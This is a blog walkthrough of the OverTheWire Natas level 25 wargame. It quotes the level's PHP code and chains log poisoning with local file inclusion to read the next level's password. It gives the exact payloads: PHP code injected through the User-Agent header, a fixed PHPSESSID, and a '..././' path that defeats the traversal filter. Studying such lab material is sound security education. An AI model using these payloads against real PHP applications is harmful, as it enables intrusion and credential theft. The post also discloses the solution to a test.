DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Sunday, December 15, 2013

OverTheWire Natas 25

Code inspection first!
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/tmp/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
The logRequest function lets us append attacker-controlled content to a file in /tmp whose name we partly choose. Why?
1. We control $_SERVER['HTTP_USER_AGENT'], which is simply the value of the User-Agent request header, and it is written into the log line unescaped.
2. We control session_id() through the PHPSESSID cookie: the file name is "/tmp/natas25_" . session_id() . ".log", so the cookie value picks the file name (the prefix and the .log suffix are fixed, and PHP's session module only accepts identifiers built from alphanumerics, commas and dashes, so the file stays inside /tmp).

Let's set User-Agent to be the following:
<?php echo file_get_contents('/etc/natas_webpass/natas26') ?>
and PHPSESSID value to be 'pwned'.

So, what we have achieved so far: whenever the logRequest function is called, a line containing PHP code that prints the next level's password will be appended to the file /tmp/natas25_pwned.log. The file does not exist yet; we still need something to call logRequest and then include the file.

The last step is to display this code output. We can do it by including /tmp/natas25_pwned.log file content in the page by exploiting the following function which is called on page loading:
function setLanguage(){
    /* language setup */
    if(array_key_exists("lang",$_REQUEST))
        if(safeinclude("language/" . $_REQUEST["lang"] ))
            return 1;
    safeinclude("language/en"); 
}

function safeinclude($filename){
    // check for directory traversal
    if(strstr($filename,"../")){
        logRequest("Directory traversal attempt! fixing request.");
        $filename=str_replace("../","",$filename);
    }
    // dont let ppl steal our passwords
    if(strstr($filename,"natas_webpass")){
        logRequest("Illegal file access detected! Aborting!");
        exit(-1);
    }
    // add more checks...

    if (file_exists($filename)) { 
        include($filename);
        return 1;
    }
    return 0;
}

You can see that the safeinclude function makes life hard by stripping '../' from the path. To bypass it we use the fact that str_replace makes a single left-to-right pass over the string and never re-scans its own output:
'..././' becomes '../' once the inner '../' has been removed. Therefore we can use it to escape from the 'language/' directory and include an arbitrary path (/tmp/natas25_pwned.log). Note that the second check only looks for the string "natas_webpass" in the file name; our password-reading code lives in the User-Agent header, not in the path, so that check never fires.
We will set the lang GET parameter to:
lang=..././..././..././..././..././tmp/natas25_pwned.log


This single request is enough: safeinclude sees '../' in the file name and calls logRequest, which creates /tmp/natas25_pwned.log and writes our User-Agent into it; only afterwards does the sanitised path (language/../../../../../tmp/natas25_pwned.log) reach file_exists and include, so the file we just wrote is included and the PHP code we saw earlier is executed, printing the natas26 password into the page.
Pwned ! :)

1 comment :

  1. Thank you very much for not respecting our no spoiler policy. very sad to see this.
    Regards,
    morla, OTW
